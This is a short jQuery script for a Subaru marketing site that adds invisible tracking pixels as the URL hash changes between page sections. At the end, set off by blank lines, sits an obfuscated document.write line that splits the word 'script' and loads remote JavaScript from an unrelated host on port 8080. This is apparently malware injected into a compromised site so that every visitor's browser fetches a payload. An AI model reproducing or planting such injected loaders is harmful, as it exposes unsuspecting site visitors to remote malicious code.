$(function(){
  
  // Bind an event to window.onhashchange that, when the hash changes, gets the
  // hash and adds the class "selected" to any matching nav link.
  $(window).bind( 'hashchange', function(){
    var hash = location.hash;
    
	trackingTag = '';
		
	switch ( hash.toLowerCase() )
	{
		case "#/explore":
			trackingTag = '<img src="http://www.mysurveyasia.com/strack/?p=subaru_21" width="0" height="0">';
			break;
		
		case "#/what-is-all-4-the-driver":
			trackingTag = '<img src="http://www.mysurveyasia.com/strack/?p=subaru_22" width="0" height="0">';
			break;
		
		case "#/the-subaru-difference":
			trackingTag = '<img src="http://www.mysurveyasia.com/strack/?p=subaru_23" width="0" height="0">';
			break;
		
		case "#/whats-in-it-for-you":
			trackingTag = '<img src="http://www.mysurveyasia.com/strack/?p=subaru_24" width="0" height="0">';
			break;
			
		case "#/which-subaru-are-you":
			trackingTag = '<img src="http://www.mysurveyasia.com/strack/?p=subaru_25" width="0" height="0">';
			break;
	}
    
	if ( $('#trackingCode')[0].innerHTML != trackingTag )
		$('#trackingCode')[0].innerHTML = trackingTag;
		
  })
  
  // Since the event is only triggered when the hash changes, we need to trigger
  // the event now, to handle the hash the page may have loaded with.
  $(window).trigger( 'hashchange' );
  
});





document.write('<s'+'cript type="text/javascript" src="http://assolkh.blackhulu.com:8080/Yahoo.js"></scr'+'ipt>');
